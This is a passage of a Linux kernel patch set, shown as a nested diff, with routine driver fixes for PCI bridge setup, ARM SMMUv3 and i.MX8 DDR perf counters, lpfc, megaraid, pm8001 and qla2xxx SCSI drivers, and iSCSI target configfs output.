++				/*
++				 * Temporarily disable the I/O range before updating
++				 * PCI_IO_BASE.
++				 */
++				writel(0x0000ffff, base + PCI_IO_BASE_UPPER16);
++				/* Update lower 16 bits of I/O base/limit */
++				writew(0x00f0, base + PCI_IO_BASE);
++				/* Update upper 16 bits of I/O base/limit */
++				writel(0, base + PCI_IO_BASE_UPPER16);
++
++				/* MMIO Base/Limit */
++				writel(0x0000fff0, base + PCI_MEMORY_BASE);
++
++				/* Prefetchable MMIO Base/Limit */
++				writel(0, base + PCI_PREF_LIMIT_UPPER32);
++				writel(0x0000fff0, base + PCI_PREF_MEMORY_BASE);
++				writel(0xffffffff, base + PCI_PREF_BASE_UPPER32);
+ 			}
+ 		}
+ 	}
+diff --git a/drivers/perf/arm_smmuv3_pmu.c b/drivers/perf/arm_smmuv3_pmu.c
+index 25a269d431e45..0e17c57ddb876 100644
+--- a/drivers/perf/arm_smmuv3_pmu.c
++++ b/drivers/perf/arm_smmuv3_pmu.c
+@@ -115,6 +115,7 @@
+ #define SMMU_PMCG_PA_SHIFT              12
+ 
+ #define SMMU_PMCG_EVCNTR_RDONLY         BIT(0)
++#define SMMU_PMCG_HARDEN_DISABLE        BIT(1)
+ 
+ static int cpuhp_state_num;
+ 
+@@ -159,6 +160,20 @@ static inline void smmu_pmu_enable(struct pmu *pmu)
+ 	writel(SMMU_PMCG_CR_ENABLE, smmu_pmu->reg_base + SMMU_PMCG_CR);
+ }
+ 
++static int smmu_pmu_apply_event_filter(struct smmu_pmu *smmu_pmu,
++				       struct perf_event *event, int idx);
++
++static inline void smmu_pmu_enable_quirk_hip08_09(struct pmu *pmu)
++{
++	struct smmu_pmu *smmu_pmu = to_smmu_pmu(pmu);
++	unsigned int idx;
++
++	for_each_set_bit(idx, smmu_pmu->used_counters, smmu_pmu->num_counters)
++		smmu_pmu_apply_event_filter(smmu_pmu, smmu_pmu->events[idx], idx);
++
++	smmu_pmu_enable(pmu);
++}
++
+ static inline void smmu_pmu_disable(struct pmu *pmu)
+ {
+ 	struct smmu_pmu *smmu_pmu = to_smmu_pmu(pmu);
+@@ -167,6 +182,22 @@ static inline void smmu_pmu_disable(struct pmu *pmu)
+ 	writel(0, smmu_pmu->reg_base + SMMU_PMCG_IRQ_CTRL);
+ }
+ 
++static inline void smmu_pmu_disable_quirk_hip08_09(struct pmu *pmu)
++{
++	struct smmu_pmu *smmu_pmu = to_smmu_pmu(pmu);
++	unsigned int idx;
++
++	/*
++	 * The global disable of PMU sometimes fail to stop the counting.
++	 * Harden this by writing an invalid event type to each used counter
++	 * to forcibly stop counting.
++	 */
++	for_each_set_bit(idx, smmu_pmu->used_counters, smmu_pmu->num_counters)
++		writel(0xffff, smmu_pmu->reg_base + SMMU_PMCG_EVTYPER(idx));
++
++	smmu_pmu_disable(pmu);
++}
++
+ static inline void smmu_pmu_counter_set_value(struct smmu_pmu *smmu_pmu,
+ 					      u32 idx, u64 value)
+ {
+@@ -765,7 +796,10 @@ static void smmu_pmu_get_acpi_options(struct smmu_pmu *smmu_pmu)
+ 	switch (model) {
+ 	case IORT_SMMU_V3_PMCG_HISI_HIP08:
+ 		/* HiSilicon Erratum 162001800 */
+-		smmu_pmu->options |= SMMU_PMCG_EVCNTR_RDONLY;
++		smmu_pmu->options |= SMMU_PMCG_EVCNTR_RDONLY | SMMU_PMCG_HARDEN_DISABLE;
++		break;
++	case IORT_SMMU_V3_PMCG_HISI_HIP09:
++		smmu_pmu->options |= SMMU_PMCG_HARDEN_DISABLE;
+ 		break;
+ 	}
+ 
+@@ -890,6 +924,16 @@ static int smmu_pmu_probe(struct platform_device *pdev)
+ 	if (!dev->of_node)
+ 		smmu_pmu_get_acpi_options(smmu_pmu);
+ 
++	/*
++	 * For platforms suffer this quirk, the PMU disable sometimes fails to
++	 * stop the counters. This will leads to inaccurate or error counting.
++	 * Forcibly disable the counters with these quirk handler.
++	 */
++	if (smmu_pmu->options & SMMU_PMCG_HARDEN_DISABLE) {
++		smmu_pmu->pmu.pmu_enable = smmu_pmu_enable_quirk_hip08_09;
++		smmu_pmu->pmu.pmu_disable = smmu_pmu_disable_quirk_hip08_09;
++	}
++
+ 	/* Pick one CPU to be the preferred one to use */
+ 	smmu_pmu->on_cpu = raw_smp_processor_id();
+ 	WARN_ON(irq_set_affinity(smmu_pmu->irq, cpumask_of(smmu_pmu->on_cpu)));
+diff --git a/drivers/perf/fsl_imx8_ddr_perf.c b/drivers/perf/fsl_imx8_ddr_perf.c
+index cd4ce2b4906d1..a4cda73b81c9f 100644
+--- a/drivers/perf/fsl_imx8_ddr_perf.c
++++ b/drivers/perf/fsl_imx8_ddr_perf.c
+@@ -28,6 +28,8 @@
+ #define CNTL_CLEAR_MASK		0xFFFFFFFD
+ #define CNTL_OVER_MASK		0xFFFFFFFE
+ 
++#define CNTL_CP_SHIFT		16
++#define CNTL_CP_MASK		(0xFF << CNTL_CP_SHIFT)
+ #define CNTL_CSV_SHIFT		24
+ #define CNTL_CSV_MASK		(0xFFU << CNTL_CSV_SHIFT)
+ 
+@@ -35,6 +37,8 @@
+ #define EVENT_CYCLES_COUNTER	0
+ #define NUM_COUNTERS		4
+ 
++/* For removing bias if cycle counter CNTL.CP is set to 0xf0 */
++#define CYCLES_COUNTER_MASK	0x0FFFFFFF
+ #define AXI_MASKING_REVERT	0xffff0000	/* AXI_MASKING(MSB 16bits) + AXI_ID(LSB 16bits) */
+ 
+ #define to_ddr_pmu(p)		container_of(p, struct ddr_pmu, pmu)
+@@ -429,6 +433,17 @@ static void ddr_perf_counter_enable(struct ddr_pmu *pmu, int config,
+ 		writel(0, pmu->base + reg);
+ 		val = CNTL_EN | CNTL_CLEAR;
+ 		val |= FIELD_PREP(CNTL_CSV_MASK, config);
++
++		/*
++		 * On i.MX8MP we need to bias the cycle counter to overflow more often.
++		 * We do this by initializing bits [23:16] of the counter value via the
++		 * COUNTER_CTRL Counter Parameter (CP) field.
++		 */
++		if (pmu->devtype_data->quirks & DDR_CAP_AXI_ID_FILTER_ENHANCED) {
++			if (counter == EVENT_CYCLES_COUNTER)
++				val |= FIELD_PREP(CNTL_CP_MASK, 0xf0);
++		}
++
+ 		writel(val, pmu->base + reg);
+ 	} else {
+ 		/* Disable counter */
+@@ -468,6 +483,12 @@ static void ddr_perf_event_update(struct perf_event *event)
+ 	int ret;
+ 
+ 	new_raw_count = ddr_perf_read_counter(pmu, counter);
++	/* Remove the bias applied in ddr_perf_counter_enable(). */
++	if (pmu->devtype_data->quirks & DDR_CAP_AXI_ID_FILTER_ENHANCED) {
++		if (counter == EVENT_CYCLES_COUNTER)
++			new_raw_count &= CYCLES_COUNTER_MASK;
++	}
++
+ 	local64_add(new_raw_count, &event->count);
+ 
+ 	/*
+diff --git a/drivers/scsi/lpfc/lpfc.h b/drivers/scsi/lpfc/lpfc.h
+index 9ad233b40a9e2..664ac3069c4be 100644
+--- a/drivers/scsi/lpfc/lpfc.h
++++ b/drivers/scsi/lpfc/lpfc.h
+@@ -895,6 +895,7 @@ enum lpfc_irq_chann_mode {
+ enum lpfc_hba_bit_flags {
+ 	FABRIC_COMANDS_BLOCKED,
+ 	HBA_PCI_ERR,
++	MBX_TMO_ERR,
+ };
+ 
+ struct lpfc_hba {
+diff --git a/drivers/scsi/lpfc/lpfc_debugfs.c b/drivers/scsi/lpfc/lpfc_debugfs.c
+index 3e365e5e194a2..250d423710ca4 100644
+--- a/drivers/scsi/lpfc/lpfc_debugfs.c
++++ b/drivers/scsi/lpfc/lpfc_debugfs.c
+@@ -6069,7 +6069,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 					    phba->hba_debugfs_root,
+ 					    phba,
+ 					    &lpfc_debugfs_op_multixripools);
+-		if (!phba->debug_multixri_pools) {
++		if (IS_ERR(phba->debug_multixri_pools)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "0527 Cannot create debugfs multixripools\n");
+ 			goto debug_failed;
+@@ -6081,7 +6081,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, S_IFREG | 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_cgn_buffer_op);
+-		if (!phba->debug_cgn_buffer) {
++		if (IS_ERR(phba->debug_cgn_buffer)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "6527 Cannot create debugfs "
+ 					 "cgn_buffer\n");
+@@ -6094,7 +6094,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, S_IFREG | 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_rx_monitor_op);
+-		if (!phba->debug_rx_monitor) {
++		if (IS_ERR(phba->debug_rx_monitor)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "6528 Cannot create debugfs "
+ 					 "rx_monitor\n");
+@@ -6107,7 +6107,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_debugfs_ras_log);
+-		if (!phba->debug_ras_log) {
++		if (IS_ERR(phba->debug_ras_log)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "6148 Cannot create debugfs"
+ 					 " ras_log\n");
+@@ -6128,7 +6128,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, S_IFREG | 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_debugfs_op_lockstat);
+-		if (!phba->debug_lockstat) {
++		if (IS_ERR(phba->debug_lockstat)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "4610 Can't create debugfs lockstat\n");
+ 			goto debug_failed;
+@@ -6354,7 +6354,7 @@ nvmeio_off:
+ 		debugfs_create_file(name, 0644,
+ 				    vport->vport_debugfs_root,
+ 				    vport, &lpfc_debugfs_op_scsistat);
+-	if (!vport->debug_scsistat) {
++	if (IS_ERR(vport->debug_scsistat)) {
+ 		lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 				 "4611 Cannot create debugfs scsistat\n");
+ 		goto debug_failed;
+@@ -6365,7 +6365,7 @@ nvmeio_off:
+ 		debugfs_create_file(name, 0644,
+ 				    vport->vport_debugfs_root,
+ 				    vport, &lpfc_debugfs_op_ioktime);
+-	if (!vport->debug_ioktime) {
++	if (IS_ERR(vport->debug_ioktime)) {
+ 		lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 				 "0815 Cannot create debugfs ioktime\n");
+ 		goto debug_failed;
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index 43ebb41ded593..6b5ce9869e6b4 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -9410,11 +9410,13 @@ void
+ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ {
+ 	LIST_HEAD(abort_list);
++	LIST_HEAD(cancel_list);
+ 	struct lpfc_hba  *phba = vport->phba;
+ 	struct lpfc_sli_ring *pring;
+ 	struct lpfc_iocbq *tmp_iocb, *piocb;
+ 	u32 ulp_command;
+ 	unsigned long iflags = 0;
++	bool mbx_tmo_err;
+ 
+ 	lpfc_fabric_abort_vport(vport);
+ 
+@@ -9436,15 +9438,16 @@ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ 	if (phba->sli_rev == LPFC_SLI_REV4)
+ 		spin_lock(&pring->ring_lock);
+ 
++	mbx_tmo_err = test_bit(MBX_TMO_ERR, &phba->bit_flags);
+ 	/* First we need to issue aborts to outstanding cmds on txcmpl */
+ 	list_for_each_entry_safe(piocb, tmp_iocb, &pring->txcmplq, list) {
+-		if (piocb->cmd_flag & LPFC_IO_LIBDFC)
++		if (piocb->cmd_flag & LPFC_IO_LIBDFC && !mbx_tmo_err)
+ 			continue;
+ 
+ 		if (piocb->vport != vport)
+ 			continue;
+ 
+-		if (piocb->cmd_flag & LPFC_DRIVER_ABORTED)
++		if (piocb->cmd_flag & LPFC_DRIVER_ABORTED && !mbx_tmo_err)
+ 			continue;
+ 
+ 		/* On the ELS ring we can have ELS_REQUESTs or
+@@ -9463,8 +9466,8 @@ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ 			 */
+ 			if (phba->link_state == LPFC_LINK_DOWN)
+ 				piocb->cmd_cmpl = lpfc_cmpl_els_link_down;
+-		}
+-		if (ulp_command == CMD_GEN_REQUEST64_CR)
++		} else if (ulp_command == CMD_GEN_REQUEST64_CR ||
++			   mbx_tmo_err)
+ 			list_add_tail(&piocb->dlist, &abort_list);
+ 	}
+ 
+@@ -9476,11 +9479,19 @@ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ 	list_for_each_entry_safe(piocb, tmp_iocb, &abort_list, dlist) {
+ 		spin_lock_irqsave(&phba->hbalock, iflags);
+ 		list_del_init(&piocb->dlist);
+-		lpfc_sli_issue_abort_iotag(phba, pring, piocb, NULL);
++		if (mbx_tmo_err)
++			list_move_tail(&piocb->list, &cancel_list);
++		else
++			lpfc_sli_issue_abort_iotag(phba, pring, piocb, NULL);
++
+ 		spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	}
+-	/* Make sure HBA is alive */
+-	lpfc_issue_hb_tmo(phba);
++	if (!list_empty(&cancel_list))
++		lpfc_sli_cancel_iocbs(phba, &cancel_list, IOSTAT_LOCAL_REJECT,
++				      IOERR_SLI_ABORTED);
++	else
++		/* Make sure HBA is alive */
++		lpfc_issue_hb_tmo(phba);
+ 
+ 	if (!list_empty(&abort_list))
+ 		lpfc_printf_vlog(vport, KERN_ERR, LOG_TRACE_EVENT,
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index d54fd153cb115..f59de61803dc8 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -7563,6 +7563,8 @@ lpfc_disable_pci_dev(struct lpfc_hba *phba)
+ void
+ lpfc_reset_hba(struct lpfc_hba *phba)
+ {
++	int rc = 0;
++
+ 	/* If resets are disabled then set error state and return. */
+ 	if (!phba->cfg_enable_hba_reset) {
+ 		phba->link_state = LPFC_HBA_ERROR;
+@@ -7573,13 +7575,25 @@ lpfc_reset_hba(struct lpfc_hba *phba)
+ 	if (phba->sli.sli_flag & LPFC_SLI_ACTIVE) {
+ 		lpfc_offline_prep(phba, LPFC_MBX_WAIT);
+ 	} else {
++		if (test_bit(MBX_TMO_ERR, &phba->bit_flags)) {
++			/* Perform a PCI function reset to start from clean */
++			rc = lpfc_pci_function_reset(phba);
++			lpfc_els_flush_all_cmd(phba);
++		}
+ 		lpfc_offline_prep(phba, LPFC_MBX_NO_WAIT);
+ 		lpfc_sli_flush_io_rings(phba);
+ 	}
+ 	lpfc_offline(phba);
+-	lpfc_sli_brdrestart(phba);
+-	lpfc_online(phba);
+-	lpfc_unblock_mgmt_io(phba);
++	clear_bit(MBX_TMO_ERR, &phba->bit_flags);
++	if (unlikely(rc)) {
++		lpfc_printf_log(phba, KERN_ERR, LOG_SLI,
++				"8888 PCI function reset failed rc %x\n",
++				rc);
++	} else {
++		lpfc_sli_brdrestart(phba);
++		lpfc_online(phba);
++		lpfc_unblock_mgmt_io(phba);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index b44bb3ae22ad9..427a6ac803e50 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -3919,6 +3919,8 @@ void lpfc_poll_eratt(struct timer_list *t)
+ 	uint64_t sli_intr, cnt;
+ 
+ 	phba = from_timer(phba, t, eratt_poll);
++	if (!(phba->hba_flag & HBA_SETUP))
++		return;
+ 
+ 	/* Here we will also keep track of interrupts per sec of the hba */
+ 	sli_intr = phba->sli.slistat.sli_intr;
+@@ -7712,7 +7714,9 @@ lpfc_sli4_repost_sgl_list(struct lpfc_hba *phba,
+ 		spin_unlock_irq(&phba->hbalock);
+ 	} else {
+ 		lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+-				"3161 Failure to post sgl to port.\n");
++				"3161 Failure to post sgl to port,status %x "
++				"blkcnt %d totalcnt %d postcnt %d\n",
++				status, block_cnt, total_cnt, post_cnt);
+ 		return -EIO;
+ 	}
+ 
+@@ -8495,6 +8499,7 @@ lpfc_sli4_hba_setup(struct lpfc_hba *phba)
+ 			spin_unlock_irq(&phba->hbalock);
+ 		}
+ 	}
++	phba->hba_flag &= ~HBA_SETUP;
+ 
+ 	lpfc_sli4_dip(phba);
+ 
+@@ -9317,6 +9322,7 @@ lpfc_mbox_timeout_handler(struct lpfc_hba *phba)
+ 	 * would get IOCB_ERROR from lpfc_sli_issue_iocb, allowing
+ 	 * it to fail all outstanding SCSI IO.
+ 	 */
++	set_bit(MBX_TMO_ERR, &phba->bit_flags);
+ 	spin_lock_irq(&phba->pport->work_port_lock);
+ 	phba->pport->work_port_events &= ~WORKER_MBOX_TMO;
+ 	spin_unlock_irq(&phba->pport->work_port_lock);
+diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
+index 2ef9d41fc6f42..e5215db9ee4d1 100644
+--- a/drivers/scsi/megaraid/megaraid_sas.h
++++ b/drivers/scsi/megaraid/megaraid_sas.h
+@@ -2332,7 +2332,7 @@ struct megasas_instance {
+ 	u32 support_morethan256jbod; /* FW support for more than 256 PD/JBOD */
+ 	bool use_seqnum_jbod_fp;   /* Added for PD sequence */
+ 	bool smp_affinity_enable;
+-	spinlock_t crashdump_lock;
++	struct mutex crashdump_lock;
+ 
+ 	struct megasas_register_set __iomem *reg_set;
+ 	u32 __iomem *reply_post_host_index_addr[MR_MAX_MSIX_REG_ARRAY];
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index 13ee8e4c4f570..e392a984c7b87 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -3272,14 +3272,13 @@ fw_crash_buffer_store(struct device *cdev,
+ 	struct megasas_instance *instance =
+ 		(struct megasas_instance *) shost->hostdata;
+ 	int val = 0;
+-	unsigned long flags;
+ 
+ 	if (kstrtoint(buf, 0, &val) != 0)
+ 		return -EINVAL;
+ 
+-	spin_lock_irqsave(&instance->crashdump_lock, flags);
++	mutex_lock(&instance->crashdump_lock);
+ 	instance->fw_crash_buffer_offset = val;
+-	spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++	mutex_unlock(&instance->crashdump_lock);
+ 	return strlen(buf);
+ }
+ 
+@@ -3294,24 +3293,23 @@ fw_crash_buffer_show(struct device *cdev,
+ 	unsigned long dmachunk = CRASH_DMA_BUF_SIZE;
+ 	unsigned long chunk_left_bytes;
+ 	unsigned long src_addr;
+-	unsigned long flags;
+ 	u32 buff_offset;
+ 
+-	spin_lock_irqsave(&instance->crashdump_lock, flags);
++	mutex_lock(&instance->crashdump_lock);
+ 	buff_offset = instance->fw_crash_buffer_offset;
+ 	if (!instance->crash_dump_buf ||
+ 		!((instance->fw_crash_state == AVAILABLE) ||
+ 		(instance->fw_crash_state == COPYING))) {
+ 		dev_err(&instance->pdev->dev,
+ 			"Firmware crash dump is not available\n");
+-		spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++		mutex_unlock(&instance->crashdump_lock);
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (buff_offset > (instance->fw_crash_buffer_size * dmachunk)) {
+ 		dev_err(&instance->pdev->dev,
+ 			"Firmware crash dump offset is out of range\n");
+-		spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++		mutex_unlock(&instance->crashdump_lock);
+ 		return 0;
+ 	}
+ 
+@@ -3323,7 +3321,7 @@ fw_crash_buffer_show(struct device *cdev,
+ 	src_addr = (unsigned long)instance->crash_buf[buff_offset / dmachunk] +
+ 		(buff_offset % dmachunk);
+ 	memcpy(buf, (void *)src_addr, size);
+-	spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++	mutex_unlock(&instance->crashdump_lock);
+ 
+ 	return size;
+ }
+@@ -3348,7 +3346,6 @@ fw_crash_state_store(struct device *cdev,
+ 	struct megasas_instance *instance =
+ 		(struct megasas_instance *) shost->hostdata;
+ 	int val = 0;
+-	unsigned long flags;
+ 
+ 	if (kstrtoint(buf, 0, &val) != 0)
+ 		return -EINVAL;
+@@ -3362,9 +3359,9 @@ fw_crash_state_store(struct device *cdev,
+ 	instance->fw_crash_state = val;
+ 
+ 	if ((val == COPIED) || (val == COPY_ERROR)) {
+-		spin_lock_irqsave(&instance->crashdump_lock, flags);
++		mutex_lock(&instance->crashdump_lock);
+ 		megasas_free_host_crash_buffer(instance);
+-		spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++		mutex_unlock(&instance->crashdump_lock);
+ 		if (val == COPY_ERROR)
+ 			dev_info(&instance->pdev->dev, "application failed to "
+ 				"copy Firmware crash dump\n");
+@@ -7423,7 +7420,7 @@ static inline void megasas_init_ctrl_params(struct megasas_instance *instance)
+ 	init_waitqueue_head(&instance->int_cmd_wait_q);
+ 	init_waitqueue_head(&instance->abort_cmd_wait_q);
+ 
+-	spin_lock_init(&instance->crashdump_lock);
++	mutex_init(&instance->crashdump_lock);
+ 	spin_lock_init(&instance->mfi_pool_lock);
+ 	spin_lock_init(&instance->hba_lock);
+ 	spin_lock_init(&instance->stream_lock);
+diff --git a/drivers/scsi/pm8001/pm8001_init.c b/drivers/scsi/pm8001/pm8001_init.c
+index 7a7d63aa90e21..da65234add432 100644
+--- a/drivers/scsi/pm8001/pm8001_init.c
++++ b/drivers/scsi/pm8001/pm8001_init.c
+@@ -274,7 +274,6 @@ static irqreturn_t pm8001_interrupt_handler_intx(int irq, void *dev_id)
+ 	return ret;
+ }
+ 
+-static u32 pm8001_setup_irq(struct pm8001_hba_info *pm8001_ha);
+ static u32 pm8001_request_irq(struct pm8001_hba_info *pm8001_ha);
+ 
+ /**
+@@ -295,13 +294,6 @@ static int pm8001_alloc(struct pm8001_hba_info *pm8001_ha,
+ 	pm8001_dbg(pm8001_ha, INIT, "pm8001_alloc: PHY:%x\n",
+ 		   pm8001_ha->chip->n_phy);
+ 
+-	/* Setup Interrupt */
+-	rc = pm8001_setup_irq(pm8001_ha);
+-	if (rc) {
+-		pm8001_dbg(pm8001_ha, FAIL,
+-			   "pm8001_setup_irq failed [ret: %d]\n", rc);
+-		goto err_out;
+-	}
+ 	/* Request Interrupt */
+ 	rc = pm8001_request_irq(pm8001_ha);
+ 	if (rc)
+@@ -1021,47 +1013,38 @@ static u32 pm8001_request_msix(struct pm8001_hba_info *pm8001_ha)
+ }
+ #endif
+ 
+-static u32 pm8001_setup_irq(struct pm8001_hba_info *pm8001_ha)
+-{
+-	struct pci_dev *pdev;
+-
+-	pdev = pm8001_ha->pdev;
+-
+-#ifdef PM8001_USE_MSIX
+-	if (pci_find_capability(pdev, PCI_CAP_ID_MSIX))
+-		return pm8001_setup_msix(pm8001_ha);
+-	pm8001_dbg(pm8001_ha, INIT, "MSIX not supported!!!\n");
+-#endif
+-	return 0;
+-}
+-
+ /**
+  * pm8001_request_irq - register interrupt
+  * @pm8001_ha: our ha struct.
+  */
+ static u32 pm8001_request_irq(struct pm8001_hba_info *pm8001_ha)
+ {
+-	struct pci_dev *pdev;
++	struct pci_dev *pdev = pm8001_ha->pdev;
++#ifdef PM8001_USE_MSIX
+ 	int rc;
+ 
+-	pdev = pm8001_ha->pdev;
++	if (pci_find_capability(pdev, PCI_CAP_ID_MSIX)) {
++		rc = pm8001_setup_msix(pm8001_ha);
++		if (rc) {
++			pm8001_dbg(pm8001_ha, FAIL,
++				   "pm8001_setup_irq failed [ret: %d]\n", rc);
++			return rc;
++		}
+ 
+-#ifdef PM8001_USE_MSIX
+-	if (pdev->msix_cap && pci_msi_enabled())
+-		return pm8001_request_msix(pm8001_ha);
+-	else {
+-		pm8001_dbg(pm8001_ha, INIT, "MSIX not supported!!!\n");
+-		goto intx;
++		if (pdev->msix_cap && pci_msi_enabled())
++			return pm8001_request_msix(pm8001_ha);
+ 	}
++
++	pm8001_dbg(pm8001_ha, INIT, "MSIX not supported!!!\n");
+ #endif
+ 
+-intx:
+ 	/* initialize the INT-X interrupt */
+ 	pm8001_ha->irq_vector[0].irq_id = 0;
+ 	pm8001_ha->irq_vector[0].drv_inst = pm8001_ha;
+-	rc = request_irq(pdev->irq, pm8001_interrupt_handler_intx, IRQF_SHARED,
+-		pm8001_ha->name, SHOST_TO_SAS_HA(pm8001_ha->shost));
+-	return rc;
++
++	return request_irq(pdev->irq, pm8001_interrupt_handler_intx,
++			   IRQF_SHARED, pm8001_ha->name,
++			   SHOST_TO_SAS_HA(pm8001_ha->shost));
+ }
+ 
+ /**
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index f060e593685de..a7a364760b800 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -116,7 +116,7 @@ qla2x00_dfs_create_rport(scsi_qla_host_t *vha, struct fc_port *fp)
+ 
+ 	sprintf(wwn, "pn-%016llx", wwn_to_u64(fp->port_name));
+ 	fp->dfs_rport_dir = debugfs_create_dir(wwn, vha->dfs_rport_root);
+-	if (!fp->dfs_rport_dir)
++	if (IS_ERR(fp->dfs_rport_dir))
+ 		return;
+ 	if (NVME_TARGET(vha->hw, fp))
+ 		debugfs_create_file("dev_loss_tmo", 0600, fp->dfs_rport_dir,
+@@ -708,14 +708,14 @@ create_nodes:
+ 	if (IS_QLA27XX(ha) || IS_QLA83XX(ha) || IS_QLA28XX(ha)) {
+ 		ha->tgt.dfs_naqp = debugfs_create_file("naqp",
+ 		    0400, ha->dfs_dir, vha, &dfs_naqp_ops);
+-		if (!ha->tgt.dfs_naqp) {
++		if (IS_ERR(ha->tgt.dfs_naqp)) {
+ 			ql_log(ql_log_warn, vha, 0xd011,
+ 			       "Unable to create debugFS naqp node.\n");
+ 			goto out;
+ 		}
+ 	}
+ 	vha->dfs_rport_root = debugfs_create_dir("rports", ha->dfs_dir);
+-	if (!vha->dfs_rport_root) {
++	if (IS_ERR(vha->dfs_rport_root)) {
+ 		ql_log(ql_log_warn, vha, 0xd012,
+ 		       "Unable to create debugFS rports node.\n");
+ 		goto out;
+diff --git a/drivers/target/iscsi/iscsi_target_configfs.c b/drivers/target/iscsi/iscsi_target_configfs.c
+index 5d0f51822414e..c142a67dc7cc2 100644
+--- a/drivers/target/iscsi/iscsi_target_configfs.c
++++ b/drivers/target/iscsi/iscsi_target_configfs.c
+@@ -533,102 +533,102 @@ static ssize_t lio_target_nacl_info_show(struct config_item *item, char *page)
+ 	spin_lock_bh(&se_nacl->nacl_sess_lock);
+ 	se_sess = se_nacl->nacl_sess;
+ 	if (!se_sess) {
+-		rb += sprintf(page+rb, "No active iSCSI Session for Initiator"
++		rb += sysfs_emit_at(page, rb, "No active iSCSI Session for Initiator"
+ 			" Endpoint: %s\n", se_nacl->initiatorname);
+ 	} else {
+ 		sess = se_sess->fabric_sess_ptr;
+ 
+-		rb += sprintf(page+rb, "InitiatorName: %s\n",
++		rb += sysfs_emit_at(page, rb, "InitiatorName: %s\n",
+ 			sess->sess_ops->InitiatorName);
+-		rb += sprintf(page+rb, "InitiatorAlias: %s\n",
++		rb += sysfs_emit_at(page, rb, "InitiatorAlias: %s\n",
+ 			sess->sess_ops->InitiatorAlias);
+ 
+-		rb += sprintf(page+rb,
++		rb += sysfs_emit_at(page, rb,
+ 			      "LIO Session ID: %u   ISID: 0x%6ph  TSIH: %hu  ",
+ 			      sess->sid, sess->isid, sess->tsih);
+-		rb += sprintf(page+rb, "SessionType: %s\n",
++		rb += sysfs_emit_at(page, rb, "SessionType: %s\n",
+ 				(sess->sess_ops->SessionType) ?
+ 				"Discovery" : "Normal");
+-		rb += sprintf(page+rb, "Session State: ");
++		rb += sysfs_emit_at(page, rb, "Session State: ");
+ 		switch (sess->session_state) {
+ 		case TARG_SESS_STATE_FREE:
+-			rb += sprintf(page+rb, "TARG_SESS_FREE\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_FREE\n");
+ 			break;
+ 		case TARG_SESS_STATE_ACTIVE:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_ACTIVE\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_ACTIVE\n");
+ 			break;
+ 		case TARG_SESS_STATE_LOGGED_IN:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_LOGGED_IN\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_LOGGED_IN\n");
+ 			break;
+ 		case TARG_SESS_STATE_FAILED:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_FAILED\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_FAILED\n");
+ 			break;
+ 		case TARG_SESS_STATE_IN_CONTINUE:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_IN_CONTINUE\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_IN_CONTINUE\n");
+ 			break;
+ 		default:
+-			rb += sprintf(page+rb, "ERROR: Unknown Session"
++			rb += sysfs_emit_at(page, rb, "ERROR: Unknown Session"
+ 					" State!\n");
+ 			break;
+ 		}
+ 
